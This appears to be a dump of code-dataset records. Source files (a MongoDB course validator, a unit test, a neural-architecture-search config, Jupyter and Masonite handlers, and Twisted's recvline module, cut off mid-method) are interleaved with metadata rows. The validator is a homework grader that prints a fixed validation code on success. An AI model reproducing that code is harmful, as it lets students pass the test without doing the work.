XXXXXX XXXXXXX XXXXXXX XXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX XX XXXXX
XXXXXX XXXXXXX XXXXX X XXXXXXXX XXXXX XX XXXXXXXX
XXXXXXXXXXXXXX XXXXXXXXX XXX XXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX XXXXXXXX XXX
XXXXXXX XX XXX XXXXXXXXXX XXXXX X XXXXXXXX XXXXXXX XXXXXXXXXXXXXX
| 31.571429 | 79 | 0.90724 | 37 | 442 | 10.837838 | 0.405405 | 0.064838 | 0.069825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09276 | 442 | 13 | 80 | 34 | 1 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a5a0693bd6a7c0f8cfa155d31fe890ebc999563 | 3,054 | py | Python | src/m101j/week02/project/m101j_blog/validate_sourcecode.py | hemmerling/nosql-mongodb2013 | bd2bb4f76234e0732b738f14cb474f7554c864c1 | [
"Apache-2.0"
] | null | null | null | src/m101j/week02/project/m101j_blog/validate_sourcecode.py | hemmerling/nosql-mongodb2013 | bd2bb4f76234e0732b738f14cb474f7554c864c1 | [
"Apache-2.0"
] | null | null | null | src/m101j/week02/project/m101j_blog/validate_sourcecode.py | hemmerling/nosql-mongodb2013 | bd2bb4f76234e0732b738f14cb474f7554c864c1 | [
"Apache-2.0"
] | null | null | null | import pymongo
import urllib2
import urllib
import cookielib
import random
import re
import string
# makes a little salt
def make_salt(n):
salt = ""
for i in range(n):
salt = salt + random.choice(string.ascii_letters)
return salt
# this is a validation program to make sure that the blog works correctly.
def create_user(username, password):
try:
print "Trying to create a test user ", username
cj = cookielib.CookieJar()
url = "http://localhost:8082/signup"
data = urllib.urlencode([("email",""),("username",username), ("password",password), ("verify",password)])
request = urllib2.Request(url=url, data=data)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
f = opener.open(request)
# check that the user is in the user table
connection = pymongo.Connection("mongodb://localhost", safe=True)
db = connection.blog
users = db.users
user = users.find_one({'_id':username})
if (user == None):
print "Could not find the test user ", username, "in the users collection."
return False
print "Found the test user ", username, " in the users collection"
# check that the user has been built
result = f.read()
expr = re.compile("Welcome\s+"+ username)
if expr.search(result):
return True
print "When we tried to create a user, here is the output we got\n"
print result
return False
except:
print "the request to ", url, " failed, so your blog may not be running."
return False
def try_to_login(username, password):
try:
print "Trying to login for test user ", username
cj = cookielib.CookieJar()
url = "http://localhost:8082/login"
data = urllib.urlencode([("username",username), ("password",password)])
request = urllib2.Request(url=url, data=data)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
f = opener.open(request)
# check for successful login
result = f.read()
expr = re.compile("Welcome\s+"+ username)
if expr.search(result):
return True
print "When we tried to login, here is the output we got\n"
print result
return False
except:
print "the request to ", url, " failed, so your blog may not be running."
raise
return False
username = make_salt(7)
password = make_salt(8)
# try to create user
if (create_user(username, password)):
print "User creation successful. "
# try to login
if (try_to_login(username, password)):
print "User login successful."
print "Validation Code is ", "fhj837hf9376hgf93hf832jf9"
else:
print "User login failed"
print "Sorry, you have not solved it yet."
else:
print "Sorry, you have not solved it yet."
| 30.848485 | 114 | 0.602489 | 374 | 3,054 | 4.882353 | 0.307487 | 0.03943 | 0.035049 | 0.028478 | 0.525739 | 0.506024 | 0.470975 | 0.470975 | 0.394304 | 0.394304 | 0 | 0.014085 | 0.302554 | 3,054 | 98 | 115 | 31.163265 | 0.843192 | 0.074329 | 0 | 0.464789 | 0 | 0 | 0.255421 | 0.009188 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.098592 | 0.098592 | null | null | 0.225352 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
6a5b27469b73eded1bc8650c388be56bd3994f26 | 690 | py | Python | Python/LongestSubstringWithoutRepeatingCharactersTest.py | TonnyL/Windary | 39f85cdedaaf5b85f7ce842ecef975301fc974cf | [
"MIT"
] | 205 | 2017-11-16T08:38:46.000Z | 2022-03-06T05:50:03.000Z | Python/LongestSubstringWithoutRepeatingCharactersTest.py | santosh241/Windary | 39f85cdedaaf5b85f7ce842ecef975301fc974cf | [
"MIT"
] | 3 | 2018-04-10T10:17:52.000Z | 2020-12-11T08:00:09.000Z | Python/LongestSubstringWithoutRepeatingCharactersTest.py | santosh241/Windary | 39f85cdedaaf5b85f7ce842ecef975301fc974cf | [
"MIT"
] | 28 | 2018-04-10T06:42:42.000Z | 2021-09-14T14:15:39.000Z | from unittest import TestCase
from LongestSubstringWithoutRepeatingCharacters import LongestSubstringWithoutRepeatingCharacters
class TestLongestSubstringWithoutRepeatingCharacters(TestCase):
def test_lengthOfLongestSubstring(self):
lswrc = LongestSubstringWithoutRepeatingCharacters()
# Expected: wke, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("pwwkew") == 3)
# Expected: b, 1
self.assertTrue(lswrc.lengthOfLongestSubstring("bbbbb") == 1)
# Expected: abc, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("abcabcbb") == 3)
# Expected: vdf, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("dvdf") == 3)
| 40.588235 | 97 | 0.734783 | 53 | 690 | 9.54717 | 0.45283 | 0.110672 | 0.150198 | 0.339921 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.176812 | 690 | 16 | 98 | 43.125 | 0.876761 | 0.094203 | 0 | 0 | 0 | 0 | 0.037097 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a5ce9dbdacda0cdea328b3b2b3585faa580788e | 2,913 | py | Python | experiments/examples/example_d1.py | cogsys-tuebingen/uninas | 06729b9cf517ec416fb798ae387c5bd9c3a278ac | [
"MIT"
] | 18 | 2020-11-22T16:03:08.000Z | 2022-03-15T12:11:46.000Z | experiments/examples/example_d1.py | cogsys-tuebingen/uninas | 06729b9cf517ec416fb798ae387c5bd9c3a278ac | [
"MIT"
] | 2 | 2022-01-04T08:10:17.000Z | 2022-01-05T08:13:14.000Z | experiments/examples/example_d1.py | cogsys-tuebingen/uninas | 06729b9cf517ec416fb798ae387c5bd9c3a278ac | [
"MIT"
] | 6 | 2021-03-08T07:08:52.000Z | 2022-02-24T12:00:43.000Z | from uninas.main import Main
"""
search the architecture of a small network via DARTS algorithm
beware that we are using fake data
"""
args = {
"cls_task": "SingleSearchTask",
"{cls_task}.save_dir": "{path_tmp}/d1/",
"{cls_task}.save_del_old": True,
"{cls_task}.is_test_run": True,
"cls_device": "CudaDevicesManager",
"{cls_device}.num_devices": 1,
"cls_trainer": "SimpleTrainer", # SimpleTrainer, LightningTrainer
"{cls_trainer}.max_epochs": 3,
"{cls_trainer}.eval_last": 2,
"{cls_trainer}.test_last": 2,
"cls_exp_loggers": "TensorBoardExpLogger",
"{cls_exp_loggers#0}.log_graph": False,
"cls_data": "Cinic10Data",
# "cls_data": "Cifar10Data",
"{cls_data}.fake": True,
"{cls_data}.valid_split": 0.0,
"{cls_data}.batch_size_train": 2,
"cls_augmentations": "DartsCifarAug",
"cls_method": "DartsSearchMethod", # DartsSearchMethod
"cls_network": "SearchUninasNetwork",
"cls_network_body": "StackedCellsNetworkBody",
"{cls_network_body}.cell_order": "n, n, r, n, n, r, n, n",
"{cls_network_body}.features_first_cell": 64,
"cls_network_stem": "DartsCifarStem",
"{cls_network_stem}.features": 48,
"cls_network_heads": "ClassificationHead",
"{cls_network_heads#0}.weight": 1.0,
"{cls_network_heads#0}.cell_idx": -1,
"{cls_network_heads#0}.persist": "True",
"cls_network_cells": "DartsCNNSearchCell, DartsCNNSearchCell",
"{cls_network_cells#0}.name": "n",
"{cls_network_cells#0}.arc_key": "n",
"{cls_network_cells#0}.arc_shared": True,
"{cls_network_cells#0}.features_mult": 1,
"{cls_network_cells#0}.stride": 1,
"{cls_network_cells#0}.num_concat": 4,
"{cls_network_cells#0}.num_blocks": 4,
"{cls_network_cells#0}.cls_block": "DartsCNNSearchBlock",
"{cls_network_cells#1}.name": "r",
"{cls_network_cells#1}.arc_key": "r",
"{cls_network_cells#1}.arc_shared": True,
"{cls_network_cells#1}.features_mult": 2,
"{cls_network_cells#1}.stride": 2,
"{cls_network_cells#1}.num_concat": 4,
"{cls_network_cells#1}.num_blocks": 4,
"{cls_network_cells#1}.cls_block": "DartsCNNSearchBlock",
"cls_network_cells_primitives": "DartsPrimitives, DartsPrimitives",
"cls_metrics": "AccuracyMetric",
"cls_initializers": "",
"cls_regularizers": "DropOutRegularizer, DropPathRegularizer",
"{cls_regularizers#1}.max_prob": 0.3,
"cls_criterion": "CrossEntropyCriterion",
"cls_optimizers": "SGDOptimizer, AdamOptimizer",
"{cls_optimizers#0}.lr": 0.05,
"{cls_optimizers#0}.momentum": 0.5,
"{cls_optimizers#1}.lr": 0.03,
"{cls_optimizers#1}.weight_decay": 1e-2,
"cls_schedulers": "CosineScheduler, ConstantScheduler",
}
if __name__ == "__main__":
# ignore the command line, use "args" instead
task = Main.new_task([], args_changes=args)
task.load()
task.run()
| 30.989362 | 71 | 0.670786 | 365 | 2,913 | 4.99726 | 0.361644 | 0.153509 | 0.148026 | 0.070175 | 0.216009 | 0.172149 | 0 | 0 | 0 | 0 | 0 | 0.026187 | 0.161002 | 2,913 | 93 | 72 | 31.322581 | 0.720131 | 0.041195 | 0 | 0 | 0 | 0 | 0.66965 | 0.40604 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015625 | 0 | 0.015625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a66aa2f0fa550d9dc4dcbb66e4e224aff9ad573 | 1,381 | py | Python | venv/Lib/site-packages/notebook/terminal/handlers.py | BoxicaLion/BasicMathFormulas | 4d9782f2c0c75ecccf4c0ea995f324f93e4fb6e2 | [
"MIT"
] | 445 | 2019-01-26T13:50:26.000Z | 2022-03-18T05:17:38.000Z | venv/Lib/site-packages/notebook/terminal/handlers.py | BoxicaLion/BasicMathFormulas | 4d9782f2c0c75ecccf4c0ea995f324f93e4fb6e2 | [
"MIT"
] | 242 | 2019-01-29T15:48:27.000Z | 2022-03-31T22:09:21.000Z | venv/Lib/site-packages/notebook/terminal/handlers.py | BoxicaLion/BasicMathFormulas | 4d9782f2c0c75ecccf4c0ea995f324f93e4fb6e2 | [
"MIT"
] | 31 | 2019-03-10T09:51:27.000Z | 2022-02-14T23:11:12.000Z | #encoding: utf-8
"""Tornado handlers for the terminal emulator."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from tornado import web
import terminado
from notebook._tz import utcnow
from ..base.handlers import IPythonHandler
from ..base.zmqhandlers import WebSocketMixin
class TerminalHandler(IPythonHandler):
"""Render the terminal interface."""
@web.authenticated
def get(self, term_name):
self.write(self.render_template('terminal.html',
ws_path="terminals/websocket/%s" % term_name))
class TermSocket(WebSocketMixin, IPythonHandler, terminado.TermSocket):
def origin_check(self):
"""Terminado adds redundant origin_check
Tornado already calls check_origin, so don't do anything here.
"""
return True
def get(self, *args, **kwargs):
if not self.get_current_user():
raise web.HTTPError(403)
return super(TermSocket, self).get(*args, **kwargs)
def on_message(self, message):
super(TermSocket, self).on_message(message)
self.application.settings['terminal_last_activity'] = utcnow()
def write_message(self, message, binary=False):
super(TermSocket, self).write_message(message, binary=binary)
self.application.settings['terminal_last_activity'] = utcnow()
| 32.116279 | 71 | 0.698769 | 162 | 1,381 | 5.845679 | 0.512346 | 0.047518 | 0.06019 | 0.06547 | 0.103485 | 0.103485 | 0.103485 | 0 | 0 | 0 | 0 | 0.003617 | 0.199131 | 1,381 | 42 | 72 | 32.880952 | 0.852622 | 0.209269 | 0 | 0.086957 | 0 | 0 | 0.07531 | 0.062917 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.217391 | 0 | 0.608696 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6a67fcfc3665727808e47d5048908514c8e7f43b | 1,100 | py | Python | app/http/controllers/BlogController.py | Balogunolalere/masonite-crud | e95f5053db486467361126e00ab56f4da3fdb819 | [
"MIT"
] | 1 | 2021-06-06T14:50:22.000Z | 2021-06-06T14:50:22.000Z | app/http/controllers/BlogController.py | Balogunolalere/masonite-crud | e95f5053db486467361126e00ab56f4da3fdb819 | [
"MIT"
] | null | null | null | app/http/controllers/BlogController.py | Balogunolalere/masonite-crud | e95f5053db486467361126e00ab56f4da3fdb819 | [
"MIT"
] | null | null | null | """A BlogController Module."""
from masonite.request import Request
from masonite.view import View
from masonite.controllers import Controller
from app.Post import Post
class BlogController(Controller):
"""BlogController Controller Class."""
def __init__(self, request: Request):
"""BlogController Initializer
Arguments:
request {masonite.request.Request} -- The Masonite Request class.
"""
self.request = request
def show(self, view: View):
posts = Post.all()
return view.render('posts', {'posts':posts})
def update(self, view: View, request: Request):
post = Post.find(request.param('id'))
return view.render('article', {'post': post})
def store(self, request:Request):
post = Post.find(request.param('id'))
post.body = request.input('body')
post.save()
return request.redirect('/articles')
def remove(self,view:View,request:Request):
post = Post.find(request.param('id'))
return view.render('delete',{'post':post})
def delete(self, request:Request):
post = Post.find(request.param('id'))
post.delete()
return request.redirect('/articles') | 25 | 68 | 0.709091 | 139 | 1,100 | 5.582734 | 0.266187 | 0.126289 | 0.092784 | 0.113402 | 0.298969 | 0.298969 | 0.298969 | 0.298969 | 0.298969 | 0.298969 | 0 | 0 | 0.137273 | 1,100 | 44 | 69 | 25 | 0.817703 | 0.154545 | 0 | 0.24 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0 | 0.16 | 0 | 0.64 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6a6febf419baf8f465358e758f801c5fbc25d396 | 19,172 | py | Python | src/twisted/conch/recvline.py | ndg63276/twisted | f672a20395e8beece6350631a70514f06c391bae | [
"Unlicense",
"MIT"
] | 2 | 2021-03-27T20:11:56.000Z | 2021-05-04T19:34:44.000Z | src/twisted/conch/recvline.py | ndg63276/twisted | f672a20395e8beece6350631a70514f06c391bae | [
"Unlicense",
"MIT"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | src/twisted/conch/recvline.py | ndg63276/twisted | f672a20395e8beece6350631a70514f06c391bae | [
"Unlicense",
"MIT"
] | 2 | 2021-05-29T21:12:22.000Z | 2021-05-30T04:56:50.000Z | # -*- test-case-name: twisted.conch.test.test_recvline -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Basic line editing support.
@author: Jp Calderone
"""
import string
from typing import Dict
from zope.interface import implementer
from twisted.conch.insults import insults, helper
from twisted.python import reflect
from twisted.python.compat import iterbytes
from twisted.logger import Logger
_counters = {} # type: Dict[str, int]
class Logging:
"""
Wrapper which logs attribute lookups.
This was useful in debugging something, I guess. I forget what.
It can probably be deleted or moved somewhere more appropriate.
Nothing special going on here, really.
"""
def __init__(self, original):
self.original = original
key = reflect.qual(original.__class__)
count = _counters.get(key, 0)
_counters[key] = count + 1
self._logFile = open(key + "-" + str(count), "w")
def __str__(self) -> str:
return str(super().__getattribute__("original"))
def __repr__(self) -> str:
return repr(super().__getattribute__("original"))
def __getattribute__(self, name):
original = super().__getattribute__("original")
logFile = super().__getattribute__("_logFile")
logFile.write(name + "\n")
return getattr(original, name)
@implementer(insults.ITerminalTransport)
class TransportSequence:
"""
An L{ITerminalTransport} implementation which forwards calls to
one or more other L{ITerminalTransport}s.
This is a cheap way for servers to keep track of the state they
expect the client to see, since all terminal manipulations can be
send to the real client and to a terminal emulator that lives in
the server process.
"""
for keyID in (
b"UP_ARROW",
b"DOWN_ARROW",
b"RIGHT_ARROW",
b"LEFT_ARROW",
b"HOME",
b"INSERT",
b"DELETE",
b"END",
b"PGUP",
b"PGDN",
b"F1",
b"F2",
b"F3",
b"F4",
b"F5",
b"F6",
b"F7",
b"F8",
b"F9",
b"F10",
b"F11",
b"F12",
):
execBytes = keyID + b" = object()"
execStr = execBytes.decode("ascii")
exec(execStr)
TAB = b"\t"
BACKSPACE = b"\x7f"
def __init__(self, *transports):
assert transports, "Cannot construct a TransportSequence with no transports"
self.transports = transports
for method in insults.ITerminalTransport:
exec(
"""\
def %s(self, *a, **kw):
for tpt in self.transports:
result = tpt.%s(*a, **kw)
return result
"""
% (method, method)
)
def getHost(self):
# ITransport.getHost
raise NotImplementedError("Unimplemented: TransportSequence.getHost")
def getPeer(self):
# ITransport.getPeer
raise NotImplementedError("Unimplemented: TransportSequence.getPeer")
def loseConnection(self):
# ITransport.loseConnection
raise NotImplementedError("Unimplemented: TransportSequence.loseConnection")
def write(self, data):
# ITransport.write
raise NotImplementedError("Unimplemented: TransportSequence.write")
def writeSequence(self, data):
# ITransport.writeSequence
raise NotImplementedError("Unimplemented: TransportSequence.writeSequence")
def cursorUp(self, n=1):
# ITerminalTransport.cursorUp
raise NotImplementedError("Unimplemented: TransportSequence.cursorUp")
def cursorDown(self, n=1):
# ITerminalTransport.cursorDown
raise NotImplementedError("Unimplemented: TransportSequence.cursorDown")
def cursorForward(self, n=1):
# ITerminalTransport.cursorForward
raise NotImplementedError("Unimplemented: TransportSequence.cursorForward")
def cursorBackward(self, n=1):
# ITerminalTransport.cursorBackward
raise NotImplementedError("Unimplemented: TransportSequence.cursorBackward")
def cursorPosition(self, column, line):
# ITerminalTransport.cursorPosition
raise NotImplementedError("Unimplemented: TransportSequence.cursorPosition")
def cursorHome(self):
# ITerminalTransport.cursorHome
raise NotImplementedError("Unimplemented: TransportSequence.cursorHome")
def index(self):
# ITerminalTransport.index
raise NotImplementedError("Unimplemented: TransportSequence.index")
def reverseIndex(self):
# ITerminalTransport.reverseIndex
raise NotImplementedError("Unimplemented: TransportSequence.reverseIndex")
def nextLine(self):
# ITerminalTransport.nextLine
raise NotImplementedError("Unimplemented: TransportSequence.nextLine")
def saveCursor(self):
# ITerminalTransport.saveCursor
raise NotImplementedError("Unimplemented: TransportSequence.saveCursor")
def restoreCursor(self):
# ITerminalTransport.restoreCursor
raise NotImplementedError("Unimplemented: TransportSequence.restoreCursor")
def setModes(self, modes):
# ITerminalTransport.setModes
raise NotImplementedError("Unimplemented: TransportSequence.setModes")
def resetModes(self, mode):
# ITerminalTransport.resetModes
raise NotImplementedError("Unimplemented: TransportSequence.resetModes")
def setPrivateModes(self, modes):
# ITerminalTransport.setPrivateModes
raise NotImplementedError("Unimplemented: TransportSequence.setPrivateModes")
def resetPrivateModes(self, modes):
# ITerminalTransport.resetPrivateModes
raise NotImplementedError("Unimplemented: TransportSequence.resetPrivateModes")
def applicationKeypadMode(self):
# ITerminalTransport.applicationKeypadMode
raise NotImplementedError(
"Unimplemented: TransportSequence.applicationKeypadMode"
)
def numericKeypadMode(self):
# ITerminalTransport.numericKeypadMode
raise NotImplementedError("Unimplemented: TransportSequence.numericKeypadMode")
def selectCharacterSet(self, charSet, which):
# ITerminalTransport.selectCharacterSet
raise NotImplementedError("Unimplemented: TransportSequence.selectCharacterSet")
def shiftIn(self):
# ITerminalTransport.shiftIn
raise NotImplementedError("Unimplemented: TransportSequence.shiftIn")
def shiftOut(self):
# ITerminalTransport.shiftOut
raise NotImplementedError("Unimplemented: TransportSequence.shiftOut")
def singleShift2(self):
# ITerminalTransport.singleShift2
raise NotImplementedError("Unimplemented: TransportSequence.singleShift2")
def singleShift3(self):
# ITerminalTransport.singleShift3
raise NotImplementedError("Unimplemented: TransportSequence.singleShift3")
def selectGraphicRendition(self, *attributes):
# ITerminalTransport.selectGraphicRendition
raise NotImplementedError(
"Unimplemented: TransportSequence.selectGraphicRendition"
)
def horizontalTabulationSet(self):
# ITerminalTransport.horizontalTabulationSet
raise NotImplementedError(
"Unimplemented: TransportSequence.horizontalTabulationSet"
)
def tabulationClear(self):
# ITerminalTransport.tabulationClear
raise NotImplementedError("Unimplemented: TransportSequence.tabulationClear")
def tabulationClearAll(self):
# ITerminalTransport.tabulationClearAll
raise NotImplementedError("Unimplemented: TransportSequence.tabulationClearAll")
def doubleHeightLine(self, top=True):
# ITerminalTransport.doubleHeightLine
raise NotImplementedError("Unimplemented: TransportSequence.doubleHeightLine")
def singleWidthLine(self):
# ITerminalTransport.singleWidthLine
raise NotImplementedError("Unimplemented: TransportSequence.singleWidthLine")
def doubleWidthLine(self):
# ITerminalTransport.doubleWidthLine
raise NotImplementedError("Unimplemented: TransportSequence.doubleWidthLine")
def eraseToLineEnd(self):
# ITerminalTransport.eraseToLineEnd
raise NotImplementedError("Unimplemented: TransportSequence.eraseToLineEnd")
def eraseToLineBeginning(self):
# ITerminalTransport.eraseToLineBeginning
raise NotImplementedError(
"Unimplemented: TransportSequence.eraseToLineBeginning"
)
def eraseLine(self):
# ITerminalTransport.eraseLine
raise NotImplementedError("Unimplemented: TransportSequence.eraseLine")
def eraseToDisplayEnd(self):
# ITerminalTransport.eraseToDisplayEnd
raise NotImplementedError("Unimplemented: TransportSequence.eraseToDisplayEnd")
def eraseToDisplayBeginning(self):
# ITerminalTransport.eraseToDisplayBeginning
raise NotImplementedError(
"Unimplemented: TransportSequence.eraseToDisplayBeginning"
)
def eraseDisplay(self):
# ITerminalTransport.eraseDisplay
raise NotImplementedError("Unimplemented: TransportSequence.eraseDisplay")
def deleteCharacter(self, n=1):
# ITerminalTransport.deleteCharacter
raise NotImplementedError("Unimplemented: TransportSequence.deleteCharacter")
def insertLine(self, n=1):
# ITerminalTransport.insertLine
raise NotImplementedError("Unimplemented: TransportSequence.insertLine")
def deleteLine(self, n=1):
# ITerminalTransport.deleteLine
raise NotImplementedError("Unimplemented: TransportSequence.deleteLine")
def reportCursorPosition(self):
# ITerminalTransport.reportCursorPosition
raise NotImplementedError(
"Unimplemented: TransportSequence.reportCursorPosition"
)
def reset(self):
# ITerminalTransport.reset
raise NotImplementedError("Unimplemented: TransportSequence.reset")
def unhandledControlSequence(self, seq):
# ITerminalTransport.unhandledControlSequence
raise NotImplementedError(
"Unimplemented: TransportSequence.unhandledControlSequence"
)
class LocalTerminalBufferMixin:
"""
A mixin for RecvLine subclasses which records the state of the terminal.
This is accomplished by performing all L{ITerminalTransport} operations on both
the transport passed to makeConnection and an instance of helper.TerminalBuffer.
@ivar terminalCopy: A L{helper.TerminalBuffer} instance which efforts
will be made to keep up to date with the actual terminal
associated with this protocol instance.
"""
def makeConnection(self, transport):
self.terminalCopy = helper.TerminalBuffer()
self.terminalCopy.connectionMade()
return super().makeConnection(TransportSequence(transport, self.terminalCopy))
def __str__(self) -> str:
return str(self.terminalCopy)
class RecvLine(insults.TerminalProtocol):
"""
L{TerminalProtocol} which adds line editing features.
Clients will be prompted for lines of input with all the usual
features: character echoing, left and right arrow support for
moving the cursor to different areas of the line buffer, backspace
and delete for removing characters, and insert for toggling
between typeover and insert mode. Tabs will be expanded to enough
spaces to move the cursor to the next tabstop (every four
characters by default). Enter causes the line buffer to be
cleared and the line to be passed to the lineReceived() method
which, by default, does nothing. Subclasses are responsible for
redrawing the input prompt (this will probably change).
"""
width = 80
height = 24
TABSTOP = 4
ps = (b">>> ", b"... ")
pn = 0
_printableChars = string.printable.encode("ascii")
_log = Logger()
def connectionMade(self):
# A list containing the characters making up the current line
self.lineBuffer = []
# A zero-based (wtf else?) index into self.lineBuffer.
# Indicates the current cursor position.
self.lineBufferIndex = 0
t = self.terminal
# A map of keyIDs to bound instance methods.
self.keyHandlers = {
t.LEFT_ARROW: self.handle_LEFT,
t.RIGHT_ARROW: self.handle_RIGHT,
t.TAB: self.handle_TAB,
# Both of these should not be necessary, but figuring out
# which is necessary is a huge hassle.
b"\r": self.handle_RETURN,
b"\n": self.handle_RETURN,
t.BACKSPACE: self.handle_BACKSPACE,
t.DELETE: self.handle_DELETE,
t.INSERT: self.handle_INSERT,
t.HOME: self.handle_HOME,
t.END: self.handle_END,
}
self.initializeScreen()
def initializeScreen(self):
# Hmm, state sucks. Oh well.
# For now we will just take over the whole terminal.
self.terminal.reset()
self.terminal.write(self.ps[self.pn])
# XXX Note: I would prefer to default to starting in insert
# mode, however this does not seem to actually work! I do not
# know why. This is probably of interest to implementors
# subclassing RecvLine.
# XXX XXX Note: But the unit tests all expect the initial mode
# to be insert right now. Fuck, there needs to be a way to
# query the current mode or something.
# self.setTypeoverMode()
self.setInsertMode()
def currentLineBuffer(self):
s = b"".join(self.lineBuffer)
return s[: self.lineBufferIndex], s[self.lineBufferIndex :]
def setInsertMode(self):
self.mode = "insert"
self.terminal.setModes([insults.modes.IRM])
def setTypeoverMode(self):
self.mode = "typeover"
self.terminal.resetModes([insults.modes.IRM])
def drawInputLine(self):
"""
Write a line containing the current input prompt and the current line
buffer at the current cursor position.
"""
self.terminal.write(self.ps[self.pn] + b"".join(self.lineBuffer))
def terminalSize(self, width, height):
# XXX - Clear the previous input line, redraw it at the new
# cursor position
self.terminal.eraseDisplay()
self.terminal.cursorHome()
self.width = width
self.height = height
self.drawInputLine()
def unhandledControlSequence(self, seq):
pass
def keystrokeReceived(self, keyID, modifier):
m = self.keyHandlers.get(keyID)
if m is not None:
m()
elif keyID in self._printableChars:
self.characterReceived(keyID, False)
else:
self._log.warn("Received unhandled keyID: {keyID!r}", keyID=keyID)
def characterReceived(self, ch, moreCharactersComing):
if self.mode == "insert":
self.lineBuffer.insert(self.lineBufferIndex, ch)
else:
self.lineBuffer[self.lineBufferIndex : self.lineBufferIndex + 1] = [ch]
self.lineBufferIndex += 1
self.terminal.write(ch)
def handle_TAB(self):
n = self.TABSTOP - (len(self.lineBuffer) % self.TABSTOP)
self.terminal.cursorForward(n)
self.lineBufferIndex += n
self.lineBuffer.extend(iterbytes(b" " * n))
def handle_LEFT(self):
if self.lineBufferIndex > 0:
self.lineBufferIndex -= 1
self.terminal.cursorBackward()
def handle_RIGHT(self):
if self.lineBufferIndex < len(self.lineBuffer):
self.lineBufferIndex += 1
self.terminal.cursorForward()
def handle_HOME(self):
if self.lineBufferIndex:
self.terminal.cursorBackward(self.lineBufferIndex)
self.lineBufferIndex = 0
def handle_END(self):
offset = len(self.lineBuffer) - self.lineBufferIndex
if offset:
self.terminal.cursorForward(offset)
self.lineBufferIndex = len(self.lineBuffer)
def handle_BACKSPACE(self):
if self.lineBufferIndex > 0:
self.lineBufferIndex -= 1
del self.lineBuffer[self.lineBufferIndex]
self.terminal.cursorBackward()
self.terminal.deleteCharacter()
def handle_DELETE(self):
if self.lineBufferIndex < len(self.lineBuffer):
del self.lineBuffer[self.lineBufferIndex]
self.terminal.deleteCharacter()
def handle_RETURN(self):
line = b"".join(self.lineBuffer)
self.lineBuffer = []
self.lineBufferIndex = 0
self.terminal.nextLine()
self.lineReceived(line)
def handle_INSERT(self):
assert self.mode in ("typeover", "insert")
if self.mode == "typeover":
self.setInsertMode()
else:
self.setTypeoverMode()
def lineReceived(self, line):
pass
class HistoricRecvLine(RecvLine):
"""
L{TerminalProtocol} which adds both basic line-editing features and input history.
Everything supported by L{RecvLine} is also supported by this class. In addition, the
up and down arrows traverse the input history. Each received line is automatically
added to the end of the input history.
"""
def connectionMade(self):
RecvLine.connectionMade(self)
self.historyLines = []
self.historyPosition = 0
t = self.terminal
self.keyHandlers.update(
{t.UP_ARROW: self.handle_UP, t.DOWN_ARROW: self.handle_DOWN}
)
def currentHistoryBuffer(self):
b = tuple(self.historyLines)
return b[: self.historyPosition], b[self.historyPosition :]
def _deliverBuffer(self, buf):
if buf:
for ch in iterbytes(buf[:-1]):
self.characterReceived(ch, True)
self.characterReceived(buf[-1:], False)
def handle_UP(self):
